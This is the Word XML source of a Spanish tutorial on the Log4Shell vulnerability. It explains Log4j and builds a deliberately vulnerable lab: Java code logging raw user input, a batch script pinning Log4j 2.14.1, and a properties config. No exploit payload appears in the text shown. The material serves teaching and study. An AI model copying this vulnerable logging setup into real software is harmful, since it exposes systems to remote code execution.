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3B2" w:rsidRDefault="00E12315">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Análisis técnico de la vulnerabilidad Log4Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00E12315" w:rsidRDefault="00E12315">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Verdana"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6041">
        <w:t>Log4Shell fue (¿es?) una vulnerabilidad descubierta a finales de noviembre del 2021 (</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="006C6041">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:eastAsia="Verdana"/>
          </w:rPr>
          <w:t>CVE-2021-44228</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C6041">
        <w:t>) por la que un atacante podría ejecutar código malicioso dentro de un servidor ajeno de una forma extremadamente simple y que casi puso internet patas arriba. Vamos a analizar el tema técnicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6041" w:rsidRDefault="006C604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Recursos para este artículo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6041" w:rsidRDefault="006C6041" w:rsidP="006C604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9903B2" w:rsidRPr="00592C78" w:rsidRDefault="00E12315" w:rsidP="00592C78">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="-360"/>
      </w:pPr>
      <w:r w:rsidRPr="00592C78">
        <w:t>Puedes encontrar el código fuente de todo el artículo en:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00592C78" w:rsidRDefault="006F38A0" w:rsidP="00592C7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Style w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidR="00E12315" w:rsidRPr="00592C78">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jbautistamartin/Log4ShellEjemplo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00592C78" w:rsidRDefault="009903B2" w:rsidP="006C6041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6C6041" w:rsidRPr="00592C78" w:rsidRDefault="00E12315" w:rsidP="00592C78">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="-360"/>
      </w:pPr>
      <w:r w:rsidRPr="00592C78">
        <w:t>Puedes encontrar las versiones vulnerables de Log4J en:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E12315" w:rsidRPr="00592C78" w:rsidRDefault="00E12315" w:rsidP="00592C7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592C78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Log4j-2.</w:t>
      </w:r>
      <w:r w:rsidR="00592C78" w:rsidRPr="00592C78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00592C78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00592C78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00592C78" w:rsidRPr="00592C78">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://archive.apache.org/dist/logging/log4j/2.14.1/apache-log4j-2.14.1-bin.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00592C78" w:rsidRDefault="009903B2" w:rsidP="006C6041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E12315" w:rsidRPr="00592C78" w:rsidRDefault="00592C78" w:rsidP="00592C78">
      <w:pPr>
        <w:pStyle w:val="normal0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00592C78">
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00592C78">
        <w:t xml:space="preserve"> la última versión </w:t>
      </w:r>
      <w:r w:rsidR="00E12315" w:rsidRPr="00592C78">
        <w:t xml:space="preserve"> no vulnerable en:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00592C78" w:rsidRDefault="00592C78" w:rsidP="00592C7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592C78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Log4j-2.1</w:t>
      </w:r>
      <w:r w:rsidR="00B36B48">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00592C78">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00592C78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00E12315" w:rsidRPr="00592C78">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://archive.apache.org/dist/logging/log4j/2.17.1/apache-log4j-2.17.1-bin.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="009903B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592C78" w:rsidRDefault="00592C78" w:rsidP="00B36B48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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Descárgate el código de ejemplo, y </w:t>
      </w:r>
      <w:r w:rsidR="00B36B48" w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">descomprime </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>zips</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> descargados en la carpeta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B48">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, de la siguiente forma:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD23A9" w:rsidRDefault="00BD23A9" w:rsidP="00B36B48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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD23A9" w:rsidRDefault="00BD23A9" w:rsidP="00B36B48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36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096135" cy="2122170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3B2" w:rsidRDefault="00BD23A9">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>¿</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:t>Qué es Log4j?</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Apache Log4j es una librería de código abierto muy popular para logs en java. Es extremadamente versátil y escalable.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Entiéndase como logs, el registro de mensajes o sucesos de los que se quiere dejar una constancia tal como si fuera una bitácora. Para ellos se puede usar Apache Log4j.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>De forma muy sencilla se indica al Log4J que debe guardar el evento, que entre otros podría ser un error, una advertencia, o un mensaje informativo. El evento o mensaje a guardar es  transformado (en caso de ser necesario) y almacenado en un repositorio.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>El cómo es transformado nuestro mensaje y cuál es el repositorio donde va a ser guardado es algo que se puede elegir por configuración y que es totalmente ajeno a nuestro programa. El repositorio pudiera ser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00592C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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>La misma consola (es decir el mensaje se muestra por consola)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00592C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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Un archivo de texto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00592C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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Una base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00592C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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Un correo electrónico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E1231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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Incluso podría ser un WebService, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00273EA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rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">O cualquier </w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cosa que se nos ocurra a futuro.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="009903B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color w:val="000000"/>
        </w:rPr>
      </w:pP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360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Aquí hay una se las principales ventajas de la arquitectura del Log4J. Nuestros sistemas desconocen (y no tienen que preocuparse) acerca de cómo y dónde se van a guardar nuestras bitácoras ya que esto se puede configura fuera de manera externa.</w:t>
      </w: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360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hay una separación clara del negocio que resuelve nuestra aplicación, y de aspectos técnicos, en cierta manera “intrascendentes” sobre cómo y donde se guardan nuestros logs, lo cual es lo ideal en un desarrollo empresarial de software.</w:t>
      </w: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360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Veamos un ejemplo de cómo funciona esto:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B4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B4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Log4ShellEjemplo1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B4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B4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B4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B36B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B36B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B36B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B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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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Creola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clase encargada de las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bitacoras</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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448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Logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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B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LogManager</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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getLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B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="006E1989"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Log4ShellEjemplo1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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6B4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B36B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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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//Creo la clase para leer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stdin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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Scanner in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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B4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Scanner</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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B36B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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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Presetacion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 la aplicación</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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"Bienvenido a la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aplicaci</w:t>
      </w:r>
      <w:r w:rsidR="00750E2D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="80808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, por favor indique su usuario."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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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Solictud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 usuario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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B36B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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B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6B4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B36B4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Usuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B4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 "</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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usuario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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6B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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36B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nextLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B36B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6B4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36B48" w:rsidRPr="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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B36B4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....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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//Se avisa que el usuario no es correcto y se guarda un evento en la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bitacora</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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"Su usuario es incorrecto."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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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"El usuario '%s' es incorrecto."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formatted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usuario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B36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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36B48" w:rsidRDefault="00B36B48" w:rsidP="00B36B48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E1989" w:rsidRDefault="00B36B48" w:rsidP="00B36B4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50E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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0E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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REM CLASSPATH con las versiones vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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CLASSPATH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apache-log4j-2.14.1-bin\log4j-core-2.14.1.jar;apache-log4j-2.14.1-bin\log4j-api-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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750E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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REM Ejecuto el ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750E2D" w:rsidRDefault="00750E2D" w:rsidP="00750E2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java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Log4ShellEjemplo1.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E1989" w:rsidRDefault="00750E2D" w:rsidP="00750E2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PAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00B36B4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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>En el ejemplo anterior se da la bienvenida a una aplicación y se pide un usuario para acceder, se indica que dicho usuario es incorrecto, y se guarda el suceso por medio de Log4J.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560DC2" w:rsidRPr="00560DC2" w:rsidRDefault="00560DC2" w:rsidP="00560DC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Bienvenido a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>aplicacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>, por favor indique su usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560DC2" w:rsidRPr="00560DC2" w:rsidRDefault="00560DC2" w:rsidP="00560DC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Usuario: Desde las horas extras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560DC2" w:rsidRPr="00560DC2" w:rsidRDefault="00560DC2" w:rsidP="00560DC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Su usuario es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560DC2" w:rsidRPr="00560DC2" w:rsidRDefault="00560DC2" w:rsidP="00560DC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>19:32:27.246 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>] ERROR Log4ShellEjemplo1 - El usuario 'Desde las horas extras' es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00560DC2" w:rsidRDefault="00560DC2" w:rsidP="00560DC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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Presione una tecla para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>continuar .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> . .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E665B3" w:rsidRPr="00560DC2" w:rsidRDefault="00E665B3" w:rsidP="00560DC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</w:rPr>
      </w:pP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t>Sin  ninguna configuración por defecto, el “repositorio” para guarda los  registros e</w:t>
      </w:r>
      <w:r w:rsidR="009C1BB1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> la misma pantalla (es decir que simplemente se imprimirá el mensaje).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E665B3" w:rsidRDefault="00E665B3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</w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="00AA2DB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ahora vamos agregar un archivo de configuración para que en lugar de mostrar la bitácora por pantalla, lo guarde en un archivo de texto</w:t>
      </w:r>
      <w:r w:rsidR="00AA2DB3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Log4ShellEjemplo2.log</w:t>
      </w:r>
      <w:r w:rsidR="00AA2DB3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo que sería mucho </w:t>
      </w:r>
      <w:r w:rsidR="009C1BB1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidR="00AA2DB3">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> común:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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2DB3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=</w:t>
      </w:r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error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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proofErr w:type="gramEnd"/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2DB3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=</w:t>
      </w:r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Log4j2PropertiesConfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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A2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appenders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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2DB3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=</w:t>
      </w:r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file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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A2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appender.file.type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2DB3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=</w:t>
      </w:r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File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appender.file.name </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2DB3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=</w:t>
      </w:r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FileLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appender.file.filename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2DB3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=</w:t>
      </w:r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Log4ShellEjemplo2.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appender.file.layout.type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2DB3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=</w:t>
      </w:r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PatternLayout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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appender.file.layout.pattern</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2DB3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=</w:t>
      </w:r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%d [%t] %-5p %c - %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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m%n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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A2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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rootLogger.level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2DB3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=</w:t>
      </w:r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debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRPr="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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rootLogger.appenderRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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A2DB3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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2DB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file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="00B14487" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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144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rootLogger.appenderRef.file.ref</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B144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14487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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B144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144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FileLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00B14487" w:rsidRDefault="009A5989" w:rsidP="009A59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4487">
        <w:rPr>
